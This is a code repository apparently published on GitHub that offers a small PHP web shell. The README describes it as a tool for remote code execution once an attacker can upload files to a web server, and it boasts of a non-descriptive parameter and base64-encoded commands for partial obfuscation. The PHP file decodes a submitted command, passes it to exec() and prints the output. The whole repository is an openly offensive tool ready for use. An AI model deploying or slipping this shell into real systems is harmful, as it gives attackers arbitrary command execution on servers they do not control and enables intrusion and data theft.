├── LICENSE ├── README.md └── php-web-shell.php /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Derek Kleinhen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # A Simple Web Shell used for Remote Code Execution. 2 | _____________________________________________________________________________________ 3 | **Description:** A Simple PHP Web Shell used for Remote Code Execution. 4 | _____________________________________________________________________________________ 5 | **Details:** This simple web shell allows Remote Code Execution on a web server 6 | in the condition that the web server supports php, and the attacker is able to 7 | write to the web server's directories via some sort of file upload. 8 | _____________________________________________________________________________________ 9 | **Screenshots:** 10 | 11 | 12 | ![image](https://user-images.githubusercontent.com/42949132/45002842-5bd7c000-afa9-11e8-89d3-9dc772f9dc87.png) 13 | _____________________________________________________________________________________ 14 | 15 | **- Provides Clean, multi-line output, unlike many web shells.** 16 | _____________________________________________________________________________________ 17 | 18 | 19 | ![image](https://user-images.githubusercontent.com/42949132/45002845-67c38200-afa9-11e8-9bb7-e1b9c5bc8863.png) 20 | _____________________________________________________________________________________ 21 | 22 | **- Provides user indication of errors in commands, along with the actual error message.** 23 | _____________________________________________________________________________________ 24 | 25 | 26 | ![image](https://user-images.githubusercontent.com/42949132/45002901-0b149700-afaa-11e8-8fec-b6237832a7f3.png) 27 | _____________________________________________________________________________________ 28 | 29 | **- Notifies user when commands have been successfully executed, despite there being no output.** 30 | _____________________________________________________________________________________ 31 | 32 | 33 | ![image](https://user-images.githubusercontent.com/42949132/45002984-46639580-afab-11e8-9022-de9ce8804dfa.png) 34 | _____________________________________________________________________________________ 35 | 36 | **- Uses a non-descriptive parameter, and base64 encodes commands for partial obfuscation.** 37 | _____________________________________________________________________________________ 38 | -------------------------------------------------------------------------------- /php-web-shell.php: -------------------------------------------------------------------------------- 1 | PHP Web Shell 2 | 3 | 4 | 5 | 13 | 14 | 15 |
16 | Command 17 | 18 |
19 | 20 | 21 | Executed: $decoded_command"; 24 | echo str_repeat("
",2); 25 | echo "Output:"; 26 | echo str_repeat("
",2); 27 | exec($decoded_command . " 2>&1", $output, $return_status); 28 | if (isset($return_status)): 29 | if ($return_status !== 0): 30 | echo "Error in Code Execution --> "; 31 | foreach ($output as &$line) { 32 | echo "$line
"; 33 | }; 34 | elseif ($return_status == 0 && empty($output)): 35 | echo "Command ran successfully, but does not have any output."; 36 | else: 37 | foreach ($output as &$line) { 38 | echo "$line
"; 39 | }; 40 | endif; 41 | endif; 42 | ?> 43 | 44 | 45 | --------------------------------------------------------------------------------